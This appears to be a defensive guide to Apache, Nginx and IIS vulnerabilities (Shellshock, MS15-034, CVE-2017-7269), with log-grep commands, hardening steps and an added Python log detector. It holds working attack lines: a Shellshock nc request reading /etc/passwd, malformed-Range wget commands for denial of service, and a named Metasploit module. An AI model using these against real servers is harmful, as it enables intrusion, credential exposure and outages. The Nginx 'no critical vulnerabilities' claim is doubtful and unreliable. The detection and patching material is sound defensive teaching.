Vulnerabilities on Servers

Server Vulnerabilities: Understanding and Mitigating Risks

Web servers are frequent targets for attackers due to their critical role in hosting applications and services. This section covers notable vulnerabilities in Apache, Nginx, and IIS web servers, highlighting exploitation techniques, log analysis, and protection strategies.

1. Apache Web Server

Vulnerability: CVE-2014-6271 (Shellshock)

Description:

  • Exploits a flaw in the Bash shell when processing environment variables.

  • Affects systems using mod_cgi or mod_cgid to execute CGI scripts.

Attack Scenario:

  • The attacker injects malicious commands via the HTTP_USER_AGENT or other HTTP headers.

Example Command:

echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /bin/cat /etc/passwd\r\nHost: TARGET_ADDRESS\r\nConnection: close\r\n\r\n" | nc TARGET_ADDRESS 80

Outcome:

  • The /etc/passwd file contents are returned in the HTTP response.

Log Analysis: Look for suspicious requests targeting CGI scripts:

grep "/cgi-bin" /var/log/apache2/access.log

Protection:

  • Update Bash to a patched version:

    sudo apt-get update && sudo apt-get install --only-upgrade bash
  • Disable mod_cgi if not required:

    sudo a2dismod cgi
    sudo systemctl restart apache2

2. Nginx Web Server

Observation:

Between 2010 and 2017, no critical vulnerabilities were reported for Nginx. However, maintaining proper configuration and timely updates is essential to mitigate emerging threats.

Protection Recommendations:

  • Regular Updates: Keep Nginx up-to-date using your system's package manager:

    sudo apt-get update && sudo apt-get upgrade nginx
  • Configuration Hardening:

    • Disable directory listing:

      autoindex off;
    • Limit request size to prevent buffer overflows:

      client_max_body_size 1M;

3. IIS Web Server

Vulnerability 1: MS15-034 (Range Header Exploit)

Description:

  • Exploits a flaw in HTTP.sys, the kernel driver for handling HTTP requests in IIS.

  • Allows remote code execution or denial of service (DoS) using crafted Range headers.

Attack Scenario:

  • Sending a malformed Range header triggers the vulnerability.

Example Commands:

  1. Confirming vulnerability:

    wget --header="Range: bytes=0-18446744073709551615" http://TARGET_IP/resource.png
  2. Exploiting DoS:

    wget --header="Range: bytes=18-18446744073709551615" http://TARGET_IP/resource.png

Log Analysis: Check logs for unusual Range header requests:

grep "Range" C:\inetpub\logs\LogFiles\W3SVC1\*.log

Protection:

  • Apply relevant Windows updates and patches.

  • Disable HTTP.sys Range processing:

    Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Services\HTTP\Parameters" -Name "EnableRangeProcessing" -Value 0

Vulnerability 2: CVE-2017-7269 (WebDAV RCE)

Description:

  • Exploits a buffer overflow vulnerability in the ScStoragePathFromUrl function within WebDAV on IIS 6.0.

  • Can lead to remote code execution.

Affected Systems:

  • IIS 6.0 on Windows Server 2003 R2.

Exploitation:

  • Use Metasploit’s iis_webdav_scstoragepathfromurl module.

Log Analysis: Identify suspicious WebDAV requests in IIS logs:

grep "PROPFIND" C:\inetpub\logs\LogFiles\W3SVC1\*.log

Protection:

  • Upgrade IIS to version 7 or higher.

  • Disable WebDAV if not in use:

    Remove-WindowsFeature Web-DAV-Publishing

General Protection Strategies

1. Patch and Update Regularly

Ensure that web servers and underlying operating systems are updated with the latest security patches.

2. Disable Unused Modules and Services

  • Disable mod_cgi in Apache.

  • Remove WebDAV in IIS if not required.

  • Restrict access to sensitive endpoints like admin panels.

3. Harden Network and Server Configurations

  • Use firewalls to restrict access to administrative interfaces.

  • Employ IP whitelisting for management portals.

4. Log Monitoring and Alerting

  • Centralize logs using tools like the ELK Stack or Splunk.

  • Configure alerts for suspicious patterns such as:

    • Directory traversal (../).

    • SQL injection payloads (UNION SELECT).

    • Malicious Range headers.
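As an added example (not code from the original page), the following Python detector applies the alert patterns listed above, together with the Shellshock, CGI and PROPFIND indicators from the Apache and IIS sections, to Apache access-log lines. It assumes a custom LogFormat that appends the Range request header as a final quoted field; the sample log lines are constructed, not captured from a real server.

```python
import re
# Apache "combined" format plus one extra quoted field for the Range request
# header (assumes a custom LogFormat ending in "%{Range}i"; stock logs lack it).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"(?: "(?P<range>[^"]*)")?'
)

# (alert name, field, pattern) for the indicators this page discusses: CGI access,
# the Shellshock function-definition prefix, traversal, UNION SELECT, PROPFIND.
SHELLSHOCK = re.compile(r"\(\)\s*\{\s*:;\s*\}\s*;")
RULES = [
    ("cgi_bin_request", "path", re.compile(r"^/cgi-bin/")),
    ("shellshock_payload", "ua", SHELLSHOCK),
    ("shellshock_payload", "referer", SHELLSHOCK),
    ("directory_traversal", "path", re.compile(r"\.\./|%2e%2e(?:/|%2f)", re.I)),
    ("sql_injection", "path", re.compile(r"union(?:\s|%20|\+)+select", re.I)),
    ("webdav_probe", "method", re.compile(r"^PROPFIND$", re.I)),
]

def suspicious_range(header):
    """Flag Range bounds that overflow a signed 64-bit integer (the MS15-034 class)."""
    for lo, hi in re.findall(r"(\d*)-(\d*)", header or ""):
        if any(v and int(v) >= 2**63 for v in (lo, hi)):
            return True
    return False

def analyze_line(line):
    """Return the sorted alert names triggered by one log line."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparseable_line"]
    f = m.groupdict()
    alerts = {name for name, field, pat in RULES if pat.search(f[field] or "")}
    if suspicious_range(f["range"]):
        alerts.add("malformed_range")
    return sorted(alerts)

def analyze_log(lines):
    """Map each offending line to its alerts; clean lines are omitted."""
    return {ln: a for ln in lines if (a := analyze_line(ln))}

# Constructed sample lines (not from a real server): combined format + Range field.
SAMPLE = [
    '203.0.113.7 - - [10/Oct/2024:13:55:36 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0" "-"',
    '203.0.113.8 - - [10/Oct/2024:13:55:37 +0000] "HEAD /cgi-bin/status HTTP/1.1" 200 - "-" "() { :;}; /bin/cat /etc/passwd" "-"',
    '203.0.113.9 - - [10/Oct/2024:13:55:38 +0000] "GET /resource.png HTTP/1.1" 416 - "-" "Wget/1.21" "bytes=18-18446744073709551615"',
    '203.0.113.10 - - [10/Oct/2024:13:55:39 +0000] "PROPFIND /webdav/ HTTP/1.1" 207 - "-" "Microsoft-WebDAV-MiniRedir" "-"',
    '203.0.113.11 - - [10/Oct/2024:13:55:40 +0000] "GET /files?name=../../etc/passwd HTTP/1.1" 404 - "-" "curl/8.0" "-"',
]
```

Running analyze_log(SAMPLE) returns only the four offending lines with their alert names; the clean first line is dropped, and the Range check fires only on bounds that cannot fit a 64-bit signed integer, so ordinary partial-content requests are not flagged.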

5. Use Web Application Firewalls (WAFs)

Deploy WAFs to filter and block common web server attacks automatically.

Key Points

Servers are often the first line of defense in an organization's infrastructure. By understanding key vulnerabilities in Apache, Nginx, and IIS and implementing robust protection strategies, organizations can reduce their attack surface and safeguard sensitive information against a wide range of cyber threats. Regular updates, proper configuration, and vigilant monitoring are essential components of a secure server environment.